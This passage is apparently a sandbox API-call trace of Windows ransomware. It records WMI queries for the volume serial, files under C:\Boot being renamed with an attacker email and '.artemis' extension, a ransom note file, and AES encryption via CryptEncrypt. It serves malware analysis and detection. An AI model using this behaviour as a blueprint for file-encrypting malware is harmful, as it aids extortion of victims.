puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0xf, pszText=0x0) returned 0x0 [0161.532] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=4, puBuffLength=0x689f4c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f4c0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.532] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34a0c00*=0, plFlavor=0x34a0c04*=0 | out: pVal=0x689f4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34a0c00*=8, plFlavor=0x34a0c04*=0) returned 0x0 [0161.532] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.532] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.532] IWbemClassObject:Get (in: This=0x673b468, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x34a0c00*=8, plFlavor=0x34a0c04*=0 | out: pVal=0x689f4c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x34a0c00*=8, plFlavor=0x34a0c04*=0) returned 0x0 [0161.532] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.532] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.532] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0161.532] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3b [0161.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f528) returned 1 [0161.532] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), fInfoLevelId=0x0, lpFileInformation=0x689f5a4 | out: lpFileInformation=0x689f5a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0161.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f524) returned 1 [0161.533] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\bcd.log2.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0161.533] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0161.533] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0161.533] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0161.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f5cc) returned 1 [0161.534] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f648 | out: lpFileInformation=0x689f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0161.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f5c8) returned 1 [0161.534] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x689f0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0161.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f594) returned 1 [0161.583] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x34a0fe8 | out: lpFileInformation=0x34a0fe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0161.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f590) returned 1 [0161.803] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x689efd4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0161.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4c8) returned 1 [0161.803] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e8 [0161.803] GetFileType (hFile=0x4e8) returned 0x1 [0161.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4c4) returned 1 [0161.803] GetFileType (hFile=0x4e8) returned 0x1 [0161.803] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x689f5d0 | out: lpFileSizeHigh=0x689f5d0*=0x0) returned 0x10000 [0165.692] ReadFile (in: hFile=0x4e8, lpBuffer=0x36830dc, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x689f57c, lpOverlapped=0x0 | out: lpBuffer=0x36830dc*, lpNumberOfBytesRead=0x689f57c*=0x10000, lpOverlapped=0x0) returned 1 [0165.749] CloseHandle (hObject=0x4e8) returned 1 [0165.940] CryptAcquireContextW (in: phProv=0x689f51c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f51c*=0x7a9e38) returned 1 [0166.429] CryptGenRandom (in: hProv=0x7a9e38, dwLen=0x10, pbBuffer=0x34f7698 | out: pbBuffer=0x34f7698) returned 1 [0166.834] CryptImportKey (in: hProv=0x7a9e38, pbData=0x36c6ad4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f4ec | out: phKey=0x689f4ec*=0x77b3f0) returned 1 [0166.834] CryptContextAddRef (hProv=0x7a9e38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0166.834] CryptContextAddRef (hProv=0x7a9e38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0166.834] CryptDuplicateKey (in: hKey=0x77b3f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f4dc | out: phKey=0x689f4dc*=0x77af70) returned 1 [0166.835] CryptContextAddRef (hProv=0x7a9e38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0166.835] CryptSetKeyParam (hKey=0x77af70, dwParam=0x4, pbData=0x36c6bb4*=0x1, dwFlags=0x0) returned 1 [0166.835] CryptSetKeyParam (hKey=0x77af70, dwParam=0x1, pbData=0x36c6b80, dwFlags=0x0) returned 1 [0166.835] CryptEncrypt (in: hKey=0x77af70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36c6bc4*, pdwDataLen=0x689f548*=0x10010, dwBufLen=0x10010 | out: pbData=0x36c6bc4*, pdwDataLen=0x689f548*=0x10010) returned 1 [0166.835] CryptEncrypt (in: hKey=0x77af70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36d6bf8*, pdwDataLen=0x689f550*=0x0, dwBufLen=0x10 | out: pbData=0x36d6bf8*, pdwDataLen=0x689f550*=0x10) returned 1 [0166.839] CryptDestroyKey (hKey=0x77b3f0) returned 1 [0166.839] CryptReleaseContext (hProv=0x7a9e38, dwFlags=0x0) returned 1 [0166.839] CryptReleaseContext (hProv=0x7a9e38, dwFlags=0x0) returned 1 [0166.839] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x689efc0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0166.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b4) returned 1 [0166.839] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0166.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2f0) returned 1 [0166.842] CoTaskMemAlloc (cb=0x20c) returned 0x7b3f80 [0166.842] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3f80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0166.842] CoTaskMemFree (pv=0x7b3f80) [0166.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689efa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0166.843] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4f0 | out: ppv=0x689f4f0*=0x72015c) returned 0x0 [0166.843] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f4e8 | out: pAptType=0x689f4e8*=1) returned 0x0 [0166.843] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f4ec | out: ppvObject=0x689f4ec*=0x0) returned 0x80004002 [0166.843] IUnknown:Release (This=0x72015c) returned 0x1 [0166.844] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee58 | out: ppv=0x689ee58*=0x6737148) returned 0x0 [0166.844] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737148, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f070 | out: ppvObject=0x689f070*=0x0) returned 0x80004002 [0166.845] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737148, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f084 | out: ppvObject=0x689f084*=0x6738cb0) returned 0x0 [0166.845] WbemDefPath:IUnknown:Release (This=0x6737148) returned 0x0 [0166.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eca4 | out: ppvObject=0x689eca4*=0x6738cb0) returned 0x0 [0166.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec60 | out: ppvObject=0x689ec60*=0x0) returned 0x80004002 [0166.845] WbemDefPath:IUnknown:AddRef (This=0x6738cb0) returned 0x3 [0166.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e5bc | out: ppvObject=0x689e5bc*=0x0) returned 0x80004002 [0166.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0166.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e578 | out: ppvObject=0x689e578*=0x7ae4d0) returned 0x0 [0166.845] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae4d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e580 | out: pCid=0x689e580*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0166.845] WbemDefPath:IUnknown:Release (This=0x7ae4d0) returned 0x3 [0166.845] CoGetContextToken (in: pToken=0x689e5d8 | out: pToken=0x689e5d8) returned 0x0 [0166.845] CoGetContextToken (in: pToken=0x689e9e0 | out: pToken=0x689e9e0) returned 0x0 [0166.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea70 | out: ppvObject=0x689ea70*=0x0) returned 0x80004002 [0166.845] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x2 [0166.845] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x1 [0166.845] CoGetContextToken (in: pToken=0x689f368 | out: pToken=0x689f368) returned 0x0 [0166.845] CoGetContextToken (in: pToken=0x689f2c8 | out: pToken=0x689f2c8) returned 0x0 [0166.846] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x689f398*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f394 | out: ppvObject=0x689f394*=0x6738cb0) returned 0x0 [0166.846] WbemDefPath:IUnknown:AddRef (This=0x6738cb0) returned 0x3 [0166.846] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x2 [0166.846] WbemDefPath:IWbemPath:SetText (This=0x6738cb0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x689f518*=0x0, pszText=0x0 | out: puBuffLength=0x689f518*=0x20, pszText=0x0) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetText (in: This=0x6738cb0, lFlags=2, puBuffLength=0x689f518*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f518*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738cb0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738cb0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738cb0, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738cb0, puCount=0x689f49c | out: puCount=0x689f49c*=0x0) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f488 | out: puCount=0x689f488*=0x2) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0x0, pszText=0x0 | out: puBuffLength=0x689f484*=0xf, pszText=0x0) returned 0x0 [0166.846] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f484*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.846] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f438 | out: ppv=0x689f438*=0x72015c) returned 0x0 [0166.846] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f430 | out: pAptType=0x689f430*=1) returned 0x0 [0166.846] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f434 | out: ppvObject=0x689f434*=0x0) returned 0x80004002 [0166.847] IUnknown:Release (This=0x72015c) returned 0x1 [0166.847] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689eda0 | out: ppv=0x689eda0*=0x6737168) returned 0x0 [0166.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737168, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689efb8 | out: ppvObject=0x689efb8*=0x0) returned 0x80004002 [0166.847] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737168, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efcc | out: ppvObject=0x689efcc*=0x6738d20) returned 0x0 [0166.847] WbemDefPath:IUnknown:Release (This=0x6737168) returned 0x0 [0166.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebec | out: ppvObject=0x689ebec*=0x6738d20) returned 0x0 [0166.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eba8 | out: ppvObject=0x689eba8*=0x0) returned 0x80004002 [0166.848] WbemDefPath:IUnknown:AddRef (This=0x6738d20) returned 0x3 [0166.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e504 | out: ppvObject=0x689e504*=0x0) returned 0x80004002 [0166.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0166.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e4c0 | out: ppvObject=0x689e4c0*=0x7ae660) returned 0x0 [0166.848] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae660, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e4c8 | out: pCid=0x689e4c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0166.848] WbemDefPath:IUnknown:Release (This=0x7ae660) returned 0x3 [0166.848] CoGetContextToken (in: pToken=0x689e520 | out: pToken=0x689e520) returned 0x0 [0166.848] CoGetContextToken (in: pToken=0x689e928 | out: pToken=0x689e928) returned 0x0 [0166.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e9b8 | out: ppvObject=0x689e9b8*=0x0) returned 0x80004002 [0166.848] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x2 [0166.848] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x1 [0166.848] CoGetContextToken (in: pToken=0x689f2b0 | out: pToken=0x689f2b0) returned 0x0 [0166.848] CoGetContextToken (in: pToken=0x689f210 | out: pToken=0x689f210) returned 0x0 [0166.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738d20, riid=0x689f2e0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f2dc | out: ppvObject=0x689f2dc*=0x6738d20) returned 0x0 [0166.848] WbemDefPath:IUnknown:AddRef (This=0x6738d20) returned 0x3 [0166.848] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x2 [0166.848] WbemDefPath:IWbemPath:SetText (This=0x6738d20, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0166.848] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738d20, puCount=0x689f460 | out: puCount=0x689f460*=0x2) returned 0x0 [0166.848] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=4, puBuffLength=0x689f45c*=0x0, pszText=0x0 | out: puBuffLength=0x689f45c*=0xf, pszText=0x0) returned 0x0 [0166.848] WbemDefPath:IWbemPath:GetText (in: This=0x6738d20, lFlags=4, puBuffLength=0x689f45c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f45c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.849] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f460 | out: ppv=0x689f460*=0x72015c) returned 0x0 [0166.849] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f458 | out: pAptType=0x689f458*=1) returned 0x0 [0166.849] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f45c | out: ppvObject=0x689f45c*=0x0) returned 0x80004002 [0166.849] IUnknown:Release (This=0x72015c) returned 0x1 [0166.849] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f080 | out: ppv=0x689f080*=0x673d0a8) returned 0x0 [0166.849] WbemLocator:IUnknown:QueryInterface (in: This=0x673d0a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f298 | out: ppvObject=0x689f298*=0x0) returned 0x80004002 [0166.849] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d0a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f2ac | out: ppvObject=0x689f2ac*=0x6737330) returned 0x0 [0166.849] WbemLocator:IUnknown:Release (This=0x673d0a8) returned 0x0 [0166.850] WbemLocator:IUnknown:QueryInterface (in: This=0x6737330, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eecc | out: 